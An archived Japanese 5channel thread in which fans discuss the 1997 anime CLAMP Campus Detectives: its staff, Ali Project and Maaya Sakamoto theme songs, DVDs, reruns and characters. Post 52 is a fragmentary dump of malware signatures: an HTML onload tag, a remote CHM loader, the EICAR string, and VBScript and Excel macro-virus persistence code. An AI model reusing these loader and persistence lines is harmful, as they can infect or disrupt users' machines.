5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

CLAMP学園探偵団【異作?】

1 :名無しか・・・何もかも皆懐かしい:2006/10/18(水) 14:33:59 ID:???
クランプにしてはやたら面白かった。

全26話の構成の良さも、明るい雰囲気の加減も程よく出来ていたと思う。
ちょっとブッ飛んだショタアニメと思っても良し。

2 :名無しか・・・何もかも皆懐かしい:2006/10/18(水) 14:35:15 ID:???
スタッフ
原作:CLAMP(角川書店刊)
企画プロデューサー:岩田圭介(テレビ東京)、渡辺繁(バンダイビジュアル)、本間道幸(ぴえろ)
シリーズ構成:関島眞頼、あみやまさはる
キャラクターデザイン:田中比呂人
サブキャラクターデザイン:北山真理
美術監督:池田祐二(Studio Wyeth)
音楽:片倉三起也(ALI PROJECT)←アニメ初
音響監督:藤山房伸
音響効果:倉橋静男(サウンドボックス)
録音制作:神南スタジオ
プロデューサー:小林数子(テレビ東京)、池口和彦(バンダイビジュアル)、萩野賢(ぴえろ)
監督:鍋島修
製作:テレビ東京、バンダイビジュアル、ぴえろ
著作:CLAMP/角川書店・バンダイビジュアル・ぴえろ・テレビ東京

3 :名無しか・・・何もかも皆懐かしい:2006/10/18(水) 14:41:14 ID:???
シラネエな

4 :名無しか・・・何もかも皆懐かしい:2006/10/18(水) 15:16:48 ID:???
公式サイト
http://pierrot.jp/title/clamp/index.html

>>3
土曜朝7時半からやってたから仕方あるまい。
97年頃の土曜といえば学校もまだ休みじゃなかったような。
時間帯が全て不幸の原因かも。

5 :名無しか・・・何もかも皆懐かしい:2006/10/18(水) 22:03:14 ID:???
坂本真綾のED曲は覚えてる
まだマイナーなころ。

6 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 07:45:36 ID:VibSExwt
アリプロもマイナー所ではない

7 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 07:55:47 ID:???
小学生が幼稚園児追いまわす様な気持ち悪い作品だった。

8 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 07:58:23 ID:???
剛球投げれる幼稚園児だからいいんじゃね

9 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 08:03:47 ID:???
各話のサブタイがほとんどパロディだった記憶がある。

10 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 12:34:35 ID:???
恋人が幼稚園児なのは多分アニメ最小年齢だろう

11 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 14:40:12 ID:???
お世辞にもあの幼稚園児には萌えない。

12 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 15:40:53 ID:???
しかしみやむー

13 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 19:38:16 ID:???
雄大寺見てると舞-himeの某キャラ思い出す・・・

14 :名無しか・・・何もかも皆懐かしい:2006/10/20(金) 03:34:22 ID:???
小学生と幼稚園と言う設定でも、あまりにも出来すぎている子供だから全然
普通に見ていた。まぁさくらの教師と生徒に比べたら年齢的にもまともだしな。

15 :名無しか・・・何もかも皆懐かしい:2006/10/20(金) 06:21:14 ID:???
ビデオのおまけ映像がちょっと気になるから、
誰か詳細希望。

16 :名無しか・・・何もかも皆懐かしい:2006/10/20(金) 08:13:44 ID:I/yIIwad
マザコン編は劇場版でやってもよかったかも・・・。
1話完結ずつでゆっくり最終回まで行って欲しかった。

17 :名無しか・・・何もかも皆懐かしい:2006/10/20(金) 09:04:23 ID:???
ttp://www.neowing.co.jp/list_from_code_banner.html?current=20&key=1496

何とネットサーフィンしてたら公認でサントラ聞ける所が。
Breath of Air,AとL'etemiteとSecret Garden,Theの曲がいいな。

18 :名無しか・・・何もかも皆懐かしい:2006/10/20(金) 20:15:05 ID:???
アニメ版と漫画版の会長はそれぞれ印象が違うね。
話の数が少ないのは原作が少ないせいか。

19 :名無しか・・・何もかも皆懐かしい:2006/10/21(土) 01:03:45 ID:???
これ懐かしいが、かなりトンデモ小学生物語だったような…

20 :名無しか・・・何もかも皆懐かしい:2006/10/21(土) 01:09:48 ID:???
今向きだよな

21 :名無しか・・・何もかも皆懐かしい:2006/10/21(土) 02:53:42 ID:???
艶やかに〜♪

22 :名無しか・・・何もかも皆懐かしい:2006/10/21(土) 20:58:50 ID:???
作品の出来は上の下ぐらいで、
人気は中の下ぐらい?


23 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 00:41:44 ID:???
昔見てたなー。
NASAが欲しがる天才的な頭脳、超大金持ちの紳士的な会長
忍者?の末裔の運動神経のいいマジメ系な子、料理上手で人当たりが
やたらいい優しい子の3人組だよね。
あと、幼稚園生がやたら大人w
トンデモ設定だけどほんわかしてたような??

24 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 01:07:25 ID:???
原作はちょっとCLAMPのおつむが追いついてなかったけど、
アニメ版の脚本と設定観はかなり良い出来だと思うよ。
ほんわか話ばかりだったけど、トンデモ設定がスパイスになってて
飽きが来なかった。

25 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 01:14:09 ID:???
ファミリー劇場で数年前に放送してたけど、三十路過ぎが楽しめる内容では無かったw

26 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 01:25:24 ID:???
まあホリックみたいに道理を重視してる作品ではないし。
ギャグにしてるのが良いんだけど。

27 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 14:36:08 ID:???
一応前スレ
http://makimo.to/2ch/salad_anime/995/995480611.html

28 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 15:03:30 ID:???
あげ

29 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 16:35:42 ID:ReVFn631
風ちゃんの姉ちゃんが所属してる

30 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 20:50:16 ID:???
蘇芳や会長は男の俺でも萌える。

31 :名無しか・・・何もかも皆懐かしい:2006/10/23(月) 18:08:49 ID:/jytdgws
ラスボスはヘチョイが石田だから許す

32 :名無しか・・・何もかも皆懐かしい:2006/10/24(火) 14:32:12 ID:???
DVD去年出たけど買った人いる?

33 :名無しか・・・何もかも皆懐かしい:2006/10/24(火) 18:46:28 ID:???
秋葉で中古を買ったよ。新品の約半額。

34 :名無しか・・・何もかも皆懐かしい:2006/10/25(水) 15:49:36 ID:???
再放送今だからこそやんないかなー

35 :名無しか・・・何もかも皆懐かしい:2006/10/25(水) 23:53:04 ID:???
途中でデュカリオンのキャラも出てきたよな?




36 :名無しか・・・何もかも皆懐かしい:2006/10/26(木) 00:37:03 ID:???
ああ、乱馬とあかねの。

37 :名無しか・・・何もかも皆懐かしい:2006/10/26(木) 14:32:04 ID:???
ハンバーガー2000個に吹いた

38 :名無しか・・・何もかも皆懐かしい:2006/10/28(土) 19:32:39 ID:???
トリビア:割と古いアニメと思われがちだが実は「ブレンパワード」と製作年が一緒である。

39 :名無しか・・・何もかも皆懐かしい:2006/10/28(土) 19:59:51 ID:???
新山志保さん、はっきり言って知らない。
新山志保さん、悪いが萌えない。

40 :名無しか・・・何もかも皆懐かしい:2006/10/28(土) 20:52:21 ID:???
生きてればこれだけアニメラッシュの今どれだけ有名になってたんだろうか・・・。

41 :名無しか・・・何もかも皆懐かしい:2006/10/28(土) 23:55:47 ID:???
LDのデザインがカッコよくていいな。

42 :名無しか・・・何もかも皆懐かしい:2006/10/30(月) 20:02:49 ID:???
DVD買ったよ

43 :名無しか・・・何もかも皆懐かしい:2006/10/30(月) 20:04:59 ID:???
記念age

44 :名無しか・・・何もかも皆懐かしい:2006/10/31(火) 22:22:36 ID:???
原作の2巻が見つかんないよ〜。
100円で売ってるハズなんだけど。

45 :名無しか・・・何もかも皆懐かしい:2006/11/02(木) 22:47:53 ID:???
CLAMPの中ではかなり毒のない作品で好きだ。

46 :名無しか・・・何もかも皆懐かしい:2006/11/02(木) 23:17:45 ID:???
DVDの新品ほぼ50%引きで手に入れた!
おまけが見れていいな。

47 :名無しか・・・何もかも皆懐かしい:2006/11/03(金) 15:02:51 ID:???
>>46
どこで手に入れた?

48 :名無しか・・・何もかも皆懐かしい:2006/11/03(金) 16:16:07 ID:dr9M5hnT
オークション

49 :名無しか・・・何もかも皆懐かしい:2006/11/07(火) 19:56:19 ID:???
DVDでおまけ劇場観たが、1分話の割にはネタにパンチが効いてて面白いな。
しかしビデオでは13本に分割してるもんだからレンタル店では場所取るから
あっという間に撤去されて見る機会が全然無いんだろうなw

50 :名無しか・・・何もかも皆懐かしい:2006/11/09(木) 07:35:48 ID:???
蘇芳の声が良すぎる・・・。


51 :名無しか・・・何もかも皆懐かしい:2006/11/11(土) 12:28:10 ID:???
一番品揃えの良いツタヤでドラマCDのレンタル無かったorz

52 :<body onload=window()>:2006/11/11(土) 16:33:08 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

53 :名無しか・・・何もかも皆懐かしい:2006/11/14(火) 22:17:33 ID:d9S6neOV
会長っ!

54 :名無しか・・・何もかも皆懐かしい:2006/11/15(水) 15:15:11 ID:???
ドラマCD誰かくれ

55 :名無しか・・・何もかも皆懐かしい:2006/11/20(月) 15:26:51 ID:k4ZY0c+k
アキラが主人公の漫画と原作のミックス感が良い感じ

56 :名無しか・・・何もかも皆懐かしい:2006/11/27(月) 02:56:57 ID:???
age

57 :名無しか・・・何もかも皆懐かしい:2006/11/29(水) 06:37:41 ID:jgEpOHFi



ヤフー動画で配信

58 :名無しか・・・何もかも皆懐かしい:2006/12/05(火) 09:29:53 ID:d1VdvRh9
age

59 :名無しか・・・何もかも皆懐かしい:2006/12/06(水) 22:57:50 ID:uAt9Evmv
ローゼンメイデン特別編のOP、ALI PROJECTの新曲「薔薇獄乙女」をオリコン1位にしようぜ!!!

http://ex17.2ch.net/test/read.cgi/news4vip/1165306462/

12月6日発売の曲名は【薔薇獄乙女】
前回のコードギアスED曲「勇侠青春謳」がオリコンTOP10入り
今回の一位は不可能な話じゃない
皆で一位にしようぜ!!!!!!!!!!

スレに来れば試聴できます。

60 :名無しか・・・何もかも皆懐かしい:2006/12/07(木) 09:47:30 ID:???
アキラキュンハァハァ

61 :名無しか・・・何もかも皆懐かしい:2006/12/07(木) 10:12:33 ID:???
鷹村蘇芳役の
新山志保さんのご冥福を心からお祈りいたします(´;ω;`)ウッ…

62 :名無しか・・・何もかも皆懐かしい:2006/12/07(木) 10:21:22 ID:???
主題歌歌ってたALI PROJECT

(・∀・)イイ!!  CLAMP学園探偵団 OP
http://www.youtube.com/watch?v=EBy3Txg1ZwY



(((( ;゜Д゜)))ガクブル  コードギアス 反逆のルルーシュ ED
http://www.youtube.com/watch?v=bUO_3ZthUM0

63 :名無しか・・・何もかも皆懐かしい:2006/12/07(木) 10:28:20 ID:???
  _, ._
( ゚ Д゚)
http://www.youtube.com/watch?v=lRrlhIMLSro

64 :名無しか・・・何もかも皆懐かしい:2006/12/07(木) 10:34:05 ID:???
CLAMP学園公認カップル

蘇芳×凪砂  玲×詠心  



残×挑  アーッ!

65 :名無しか・・・何もかも皆懐かしい:2006/12/07(木) 14:48:17 ID:???
DVDの表紙見るとそういう事になるよなw

66 :名無しか・・・何もかも皆懐かしい:2006/12/07(木) 22:42:41 ID:???
残はすべての女性に優しい設定だから必然的にアーッ!

67 :名無しか・・・何もかも皆懐かしい:2006/12/08(金) 02:06:33 ID:???
続編が見たい・・・

68 :名無しか・・・何もかも皆懐かしい:2006/12/08(金) 02:11:41 ID:???
如月晶が女だった

69 :名無しか・・・何もかも皆懐かしい:2006/12/08(金) 02:16:52 ID:???
京極緑子がツンデレだった

70 :名無しか・・・何もかも皆懐かしい:2006/12/10(日) 08:41:25 ID:???
OPでカメラでクルっと回るアキラきゅんにハァハァ

71 :名無しか・・・何もかも皆懐かしい:2006/12/12(火) 18:55:55 ID:TkKrvALn
キャラがかわいいよね

72 :名無しか・・・何もかも皆懐かしい:2006/12/16(土) 01:36:12 ID:kpNe99Rw
金持ち学校話が好きなのも、この作品のせいだ

73 :名無しか・・・何もかも皆懐かしい:2006/12/16(土) 18:11:54 ID:???
ハンバーガー2000個頼む

74 :名無しか・・・何もかも皆懐かしい:2006/12/19(火) 19:06:07 ID:K8iAZsN+
age

75 :名無しか・・・何もかも皆懐かしい:2006/12/23(土) 01:14:23 ID:???
あげ

76 :名無しか・・・何もかも皆懐かしい:2006/12/24(日) 01:18:13 ID:XR1xUBWA
あのころは受け狙いもあったが自分たちの描きたいモンを描いてたな


77 :名無しか・・・何もかも皆懐かしい:2006/12/28(木) 03:27:02 ID:z0eU+OCZ
この作品の為にも他の作品が大ヒットしないでほしかった・・・

78 :名無しか・・・何もかも皆懐かしい:2007/01/01(月) 23:22:48 ID:3kNr+xYD
キッズで再放送age

79 :名無しか・・・何もかも皆懐かしい:2007/01/08(月) 22:06:44 ID:pbJHAYLa
マジでか

80 :名無しか・・・何もかも皆懐かしい:2007/01/09(火) 18:41:10 ID:???
2月13日からね

81 :名無しか・・・何もかも皆懐かしい:2007/01/09(火) 18:45:06 ID:???
新山志保さんの声、いまいち特徴がつかめないんだけど
人気有ったの?

82 :名無しか・・・何もかも皆懐かしい:2007/01/09(火) 20:24:03 ID:???
いや、彼こそ良い声だったと思うが。

83 :名無しか・・・何もかも皆懐かしい:2007/01/10(水) 14:53:41 ID:???
人気は知らないけど、好きだった

84 :名無しか・・・何もかも皆懐かしい:2007/01/12(金) 17:00:46 ID:???
3,4クール目も決行すれば、
デュカリオン主役話もやってくれたに違いない。

85 :名無しか・・・何もかも皆懐かしい:2007/01/14(日) 18:43:52 ID:???
あげ

86 :名無しか・・・何もかも皆懐かしい:2007/01/19(金) 20:49:33 ID:???
ついにキッズステーションでCMが流れたか
ナギとかアスカとかハマーンとかのツッコミが楽しみだ。

87 :名無しか・・・何もかも皆懐かしい:2007/01/19(金) 20:51:39 ID:pfTlBpPy
あげ

88 :名無しか・・・何もかも皆懐かしい:2007/01/25(木) 03:19:22 ID:AkBjcsUj
age

89 :名無しか・・・何もかも皆懐かしい:2007/01/25(木) 03:34:25 ID:???
>>81
人気出て来た時に病死されたのでかなり惜しまれた。俺もへこんだ。
いい声してたよ。蘇芳にも合っていた。

90 :名無しか・・・何もかも皆懐かしい:2007/01/27(土) 20:01:49 ID:IYpCNPef
age

91 :名無しか・・・何もかも皆懐かしい:2007/01/30(火) 15:23:08 ID:ys+m6yQg
「欺瞞よ!」←お前はどこのアスカだw

92 :名無しか・・・何もかも皆懐かしい:2007/02/02(金) 18:11:18 ID:???
2月保守

93 :名無しか・・・何もかも皆懐かしい:2007/02/02(金) 21:21:24 ID:???
アニメ界三大様付けキャラ
ハマーン様 ハート様 残様。

94 :名無しか・・・何もかも皆懐かしい:2007/02/04(日) 00:05:23 ID:???
CLAMP学園の学園その物の設定を見ていて思ったんだが、地位等に関係なく誰でも入学できるってw
こんな学校見るからにお金持ちの、それも皇族ランク位しか入れないだろ。

95 :名無しか・・・何もかも皆懐かしい:2007/02/04(日) 15:29:09 ID:f9CIiiZ1
確かデュカリオンの主役の一人はビンボー人だったかと・・・・

96 :名無しか・・・何もかも皆懐かしい:2007/02/09(金) 16:52:11 ID:zql0zNu3
再放送寸前wktk

97 :名無しさん@お腹いっぱい。:2007/02/10(土) 01:00:42 ID:???0
救出

98 :名無しさん@お腹いっぱい。:2007/02/12(月) 23:14:57 ID:Hrg8TxtB0
いよいよ明日8時か

99 :名無しさん@お腹いっぱい。:2007/02/13(火) 08:03:01 ID:???0
しかしこの作品、せっかく3人が主要キャラなのに2人と1人に別れていたのが残念だった。
互いに秘密があるんだよな。3人の意味あるのかと疑問に思った時期もあった。

100 :名無しさん@お腹いっぱい。:2007/02/13(火) 19:25:25 ID:???0
作者がこれで探偵モノとジャンルを決めてたのも謎だ。
推理要素の無いただの事件解決モノなのに。

101 :名無しさん@お腹いっぱい。:2007/02/18(日) 06:28:38 ID:AUOd0npc0
キッズで再放送中age

102 :名無しさん@お腹いっぱい。:2007/02/21(水) 09:17:04 ID:???O
蘇應たん萌えの勢いにまかせてage

103 :名無しさん@お腹いっぱい。:2007/02/21(水) 10:18:47 ID:???0
なんかキッズでCMやってたから平日休みの日に観始めたんだけど
主題歌やエンディングが想像してたのと違ったw


104 :名無しさん@お腹いっぱい。:2007/02/21(水) 20:29:29 ID:???0
今だったらコードギアスみたいなEDになっちゃうんだろうな。


105 :名無しさん@お腹いっぱい。:2007/02/24(土) 05:21:06 ID:6smT+NtGO
会長、保守しますっ

106 :名無しさん@お腹いっぱい。:2007/02/24(土) 17:20:51 ID:???0
>>62-63
吹いたwwwwww

107 :名無しさん@お腹いっぱい。:2007/02/24(土) 21:13:01 ID:???0
ピアニィピンク最初変な歌OPって思ったけど
聞いてうちにハマッタwwwwww
ようつべで繰り返して聞きまくり見まくりw

108 :名無しさん@お腹いっぱい。:2007/02/25(日) 02:06:27 ID:???O
>>107
おまいは俺か!!
PCにも携帯にもポッドにも入ってるよ…
なんか女の子→会長に感じる曲だ。



109 :名無しさん@お腹いっぱい。:2007/02/26(月) 03:27:35 ID:???O
>>99

お調子者なフェミニスト、冷静な真面目君、かわいい天然ボケの三種類のキャラを求めた結果だ。

110 :名無しさん@お腹いっぱい。:2007/02/27(火) 15:32:26 ID:???0
>>107
放送当時から気に入ってはいたが、アリプロが歌っている事に未だ驚きが取れない。

111 :名無しさん@お腹いっぱい。:2007/02/27(火) 16:02:43 ID:???0
貴重なキレイなアリプロです

112 :名無しさん@お腹いっぱい。:2007/03/02(金) 22:22:37 ID:???0
幼稚園児と真面目に恋愛してることにびっくり
しかも違和感無い

113 :名無しさん@お腹いっぱい。:2007/03/03(土) 01:07:16 ID:???0
その幼稚園児かなり精神年齢が高いからなぁ

114 :名無しさん@お腹いっぱい。:2007/03/06(火) 21:39:33 ID:lMWQbGnL0
原作もっと書かないのが悪かったな

115 :名無しさん@お腹いっぱい。:2007/03/07(水) 15:59:01 ID:???0
女装会長が最高杉

116 :名無しさん@お腹いっぱい。:2007/03/10(土) 03:19:57 ID:Gyb4MOp4O
age

117 :名無しさん@お腹いっぱい。:2007/03/10(土) 19:38:54 ID:???0
このスレを見ている人はこんなスレも見ています。(ver 0.20)
しばわんこの和のこころ - 3 [アニメ]
●●しばわんこについて語ろう●●【和の心】 [絵本]
【Real】エルガイムvol.18【Mark-II】 [模型・プラモ]
【★モンガー!】21エモン♪NO.9【☆モア!】 [懐アニ昭和]

ほのぼの系

118 :名無しさん@お腹いっぱい。:2007/03/17(土) 19:02:24 ID:???0
最終話 女性たちを胸に すべてを終わらせる時…! CLAMP学園探偵団第4巻は発売未定です。 CLAMP
雄大寺「チクショオオオオ!蘇芳!新必殺圧縮霧殺法!」
蘇芳「さあ来い雄大寺イイ!オレは実は車に跳ねられるで記憶を無くして死ぬぞオオ!」
(ザン)
蘇芳「グアアアア!こ このザ・シノビと呼ばれる3人衆の蘇芳が…こんな小僧に…バ…バカなアアアアアア」
(ドドドドド)
蘇芳「グアアアア」
アキラ「蘇芳がやられたようだな…」
凪砂「フフフ…奴は3人衆の中でも最弱…」
詠子「マザコンごときに負けるとは生徒会の面汚しよ…」
雄大寺「くらええええ!」
(ズサ)
3人「グアアアアアアア」
雄大寺「やった…ついに3人衆とどうみても幼すぎる恋人たちを倒したぞ…これで妹之山残のいる学園生徒会の扉が開かれる!!」
残「よく来たなPCマスター雄大寺…待っていたぞ…」
(ギイイイイイイ)
雄大寺「こ…ここが生徒会室だったのか…!感じる…残の女寄せ魔力を…」
残「雄大寺よ…戦う前に一つ言っておくことがある お前は自分の母の笑顔を見るのに『私を倒すこと』が必要だと思っているようだが…別に倒さなくても見れる」
雄大寺「な 何だって!?」
残「そしてお前の実家の財力は枯れてきたので最寄りの役所へ破産申告しておいた あとは私を倒すだけだなクックック…」
(ゴゴゴゴ)
雄大寺「フ…上等だ…オレも一つ言っておくことがある このオレはお前を何でも無いのに当てつけで恨む必要があるような気がしていたが別にそんなことはなかったぜ!」
残「そうか」
雄大寺「ウオオオいくぞオオオ!」
残「さあ来い雄大寺!」
雄大寺の言いがかりが世界の女性の無茶な片思いを救うと信じて…! ご愛読ありがとうございました!

119 :名無しさん@お腹いっぱい。:2007/03/19(月) 08:59:30 ID:???0
あげ

120 :名無しさん@お腹いっぱい。:2007/03/19(月) 10:06:47 ID:???0
黒いキャラ挑が出てから話が深まった気がする。
声優は石田彰でしたか・・・

121 :名無しさん@お腹いっぱい。:2007/03/19(月) 10:11:58 ID:???0
>>118
HA・GE・SHI・I (W)

122 :名無しさん@お腹いっぱい。:2007/03/21(水) 03:18:41 ID:???O
NHK深夜で再放送しないかな

123 :名無しさん@お腹いっぱい。:2007/03/21(水) 09:37:05 ID:???0
キッズステーションでやってるよ。
深夜というよりツバサクロニクルがやってる時間帯に再放送キボン

124 :名無しさん@お腹いっぱい。:2007/03/21(水) 18:49:26 ID:???0
>>109
それだと無理に出す意味がないって事だろ。
3人で行動して「CLAMP学園探偵団」なわけだから。
2人と1人の間にそこはかとない壁が感じられてしまっては。

125 :名無しさん@お腹いっぱい。:2007/03/27(火) 10:35:26 ID:u5iSB24r0
保守

126 :名無しさん@お腹いっぱい。:2007/04/10(火) 03:13:07 ID:BPFLxjhE0
ファンが媚びてないとゆうか、
作り手も読み手もそのまま受け取って楽しんでるのが良い

127 :名無しさん@お腹いっぱい。:2007/04/10(火) 16:16:26 ID:iYcIRx4U0
昔見てた時EDである意味悪役のゆうだいじくんの背中から
羽が生えてたのが印象的だったな

EDで大川、なぎさ大川の姉さんと出てくる場面で最後に出てくるセーラーの
女の子って誰??

128 :名無しさん@お腹いっぱい。:2007/04/10(火) 21:44:12 ID:???0
ゆうだいじって蘇芳以上にマザコンだよね


129 :名無しさん@お腹いっぱい。:2007/04/18(水) 13:52:52 ID:frFNrFuYO
ほしゅ

130 :名無しさん@お腹いっぱい。:2007/04/18(水) 15:22:31 ID:???0


131 :名無しさん@お腹いっぱい。:2007/04/18(水) 17:10:08 ID:???0
>>127
美幸ちゃんでは?
17話に登場してるはず…

132 :名無しさん@お腹いっぱい。:2007/04/27(金) 17:39:56 ID:ddIroTta0


133 :名無しさん@お腹いっぱい。:2007/05/08(火) 02:53:55 ID:xK4pjNiI0
ほしゅ

134 :名無しさん@お腹いっぱい。:2007/05/14(月) 05:39:58 ID:???0
このアニメはかなり面白かった
絵がキレイだったし
キッズステーションで毎回観てたよ

135 :名無しさん@お腹いっぱい。:2007/05/17(木) 12:08:31 ID:453c/fxy0
怪盗は乳ぱんつ盗んだりするのか

136 :名無しさん@お腹いっぱい。:2007/05/19(土) 21:50:14 ID:???0
>>127
空飛ぶ翼と黄金の手足っていう対比が
何となく良いなあと思ってしまった

137 :名無しさん@お腹いっぱい。:2007/05/25(金) 18:25:03 ID:???0
CLAMPは学園探偵団を復活させる必要があると思うのよ

138 :名無しさん@お腹いっぱい。:2007/05/31(木) 20:45:27 ID:gVVZY4TL0
ほしゅ

139 :名無しさん@お腹いっぱい。:2007/06/14(木) 13:36:27 ID:OEVyJcg10
ほす

140 :◇◇ネギステル☆ネギぽ3世◇◇ ◆S67gt4GjyM :2007/06/22(金) 22:31:38 ID:???0
話も良かったけど主題歌も全部良かったなこの漫画は。
特に「Gift」は真綾ソング屈指の名曲だと思う。
>>131
その場面で一人だけとぼけたような顔してた記憶がある。

141 :名無しさん@お腹いっぱい。:2007/06/29(金) 20:55:17 ID:GzRoK2PSO
ほす

142 :名無しさん@お腹いっぱい。:2007/07/19(木) 17:34:32 ID:???0
妹之山会長かっこいい
乗馬の回の如月光という萌え系キャラの声って緒方恵美さんだったんだね。
あの回は感動した。会長マジかっこいいと思った。

143 :名無しさん@そうだ選挙に行こう:2007/07/29(日) 02:26:10 ID:bXkKKon00
蘇芳の声を惜しんでage

144 :名無しさん@お腹いっぱい。:2007/07/29(日) 22:42:18 ID:???O
キッズで放送してたの見たわ
結構面白かった

145 :名無しさん@お腹いっぱい。:2007/08/06(月) 11:46:31 ID:???0
キッズ再放送みた。音楽アリプロだったんだ。
ナルシス・ノワールとかこの作品で使われてたなんて知らなかった。
この作品にあの歌の歌詞はちょっとw

146 :名無しさん@お腹いっぱい。:2007/08/11(土) 22:05:21 ID:???0
gyaoで始まったから1話見た。
はっきり言って受付ねー。

147 :名無しさん@お腹いっぱい。:2007/08/12(日) 22:03:31 ID:???0
1話で否定は何の労力も無しに文句言うには最高ですね

148 :名無しさん@お腹いっぱい。:2007/08/14(火) 15:06:34 ID:???0
別に文句を言ったつもりはないんだけど。
せめて、こういうところが良いとか勧めてくれたら嬉しかったのに、
信者って心が狭いというか視野が狭いというか。
まあ、敢えて文句を言わせてもらうと、

今の世の中、ロリコンがキモイって言われるけど、ショタコンもきめー。
アニメ見るのに労力ってなんだよ。
そういうのは無駄な労力って言って使わないほうが良いんだよ。
だいたい、1話なんて掴みだしスタッフにも余裕があるんだから、
クオリティーが高くて視聴者を引き込んで当然だろ。
それがこんなクソじゃあ話になんねーよ。
Gyaoのレビューも見てみろよ。
ドン引きじゃん。

149 :名無しさん@お腹いっぱい。:2007/08/14(火) 16:45:28 ID:???0
甘ったれんな

150 :名無しさん@お腹いっぱい。:2007/08/14(火) 20:16:15 ID:???0
あほか?
自分の好きな作品の説明もできない低脳にはピッタリのアニメのようだな。
まあキモショタ同士、殻の中に閉じこもって喜んでろよ。

151 :名無しさん@お腹いっぱい。:2007/08/14(火) 22:33:46 ID:???0
その辺の言葉繋げて語ってるだけのバカに誰が説明するかよ。

152 :名無しさん@お腹いっぱい。:2007/08/15(水) 15:10:45 ID:???0
>その辺の言葉繋げて語ってる
言葉なんてのはな、既存のものを繋げないと通じないんだよ。
ヤオイとかショタコンとかくだらねー言葉発生させてんじゃねーよ。
せいぜい、キモオタ同士で通じる言葉作ってオナニーでもしてろ。

153 :名無しさん@お腹いっぱい。:2007/08/15(水) 15:30:06 ID:???0
↑こういう汚い口言うぐらいしかリアクション起こさないから、
判断がいい加減になってくるんだ。
皆も匿名やネットだからって迂闊な悪口書かない様に。

154 :名無しさん@お腹いっぱい。:2007/08/17(金) 03:03:37 ID:???O
夏終わらないかな…

155 :名無しさん@お腹いっぱい。:2007/08/17(金) 19:23:09 ID:???0
蘇芳と会長が出会った季節なのに・・・

156 :名無しさん@お腹いっぱい。:2007/08/23(木) 07:49:14 ID:RNJ0X/55O
ほしゅ

157 :名無しさん@お腹いっぱい。:2007/09/01(土) 14:25:45 ID:???0
シナリオはゴミみたいな出来だけど、
全編通して臭ってくる、糞フェミ臭は、すっごいなー、と思う。


158 :名無しさん@お腹いっぱい。:2007/09/01(土) 15:16:35 ID:???0
そう

159 :名無しさん@お腹いっぱい。:2007/09/02(日) 15:44:25 ID:???0
キッズで見たがなかなか面白かったな

160 :名無しさん@お腹いっぱい。:2007/09/02(日) 20:38:22 ID:???0
資質が在る

161 :名無しさん@お腹いっぱい。:2007/09/06(木) 20:37:29 ID:AlSIpazM0
ほしゅ

162 :名無しさん@お腹いっぱい。:2007/09/07(金) 17:28:56 ID:???0
これ酷いくらい腐女子向けだな
電波凄すぎて見れない

163 :名無しさん@お腹いっぱい。:2007/09/07(金) 18:20:26 ID:???0
はいはい

164 :名無しさん@お腹いっぱい。:2007/09/10(月) 22:54:45 ID:???0
ホリックの次は是非探偵団2を

165 :名無しさん@お腹いっぱい。:2007/09/11(火) 09:19:23 ID:IuPiuOEt0
age

166 :名無しさん@お腹いっぱい。:2007/09/14(金) 01:42:45 ID:???O
残たちいつものメンバー5人が海に来ていて、イキナリ3人の内誰かがゴリラの子供に間違えられて、母ゴリラにさらわれる話ってありますか?

167 :名無しさん@お腹いっぱい。:2007/09/18(火) 18:36:08 ID:???0
さっきキッズで放送してた。(今まで知らなかった)
挑が探偵団の気球船を盗んで残を追い詰めて残が仕方なく気球船を爆破するという話。
その時の「すまない、気球船・・・」がせつない
そろそろ最終回なよう

メタリックパーティより後半のエンディングのほうがクオリティ高い

168 :名無しさん@お腹いっぱい。:2007/09/19(水) 23:41:58 ID:???O
ピァニィピンク最高
わたしのたぁぁぁめに
の部分w
最初きもい歌と思ったけど聞けば聞くほど名曲

169 :名無しさん@お腹いっぱい。:2007/09/20(木) 01:00:43 ID:UWPAuaV+0
あげ

170 :名無しさん@お腹いっぱい。:2007/09/20(木) 16:19:38 ID:???0
>>168
最初変な歌&映像もおかしい、なんじゃこりゃあ^^;と思ってたけど聞いていくうちにハマって中毒性あるね


171 :名無しさん@お腹いっぱい。:2007/09/20(木) 17:21:11 ID:???0
カメラが180度回転して映されるアキラきゅんにあのOPの価値がある

172 :名無しさん@お腹いっぱい。:2007/09/21(金) 05:00:53 ID:???O
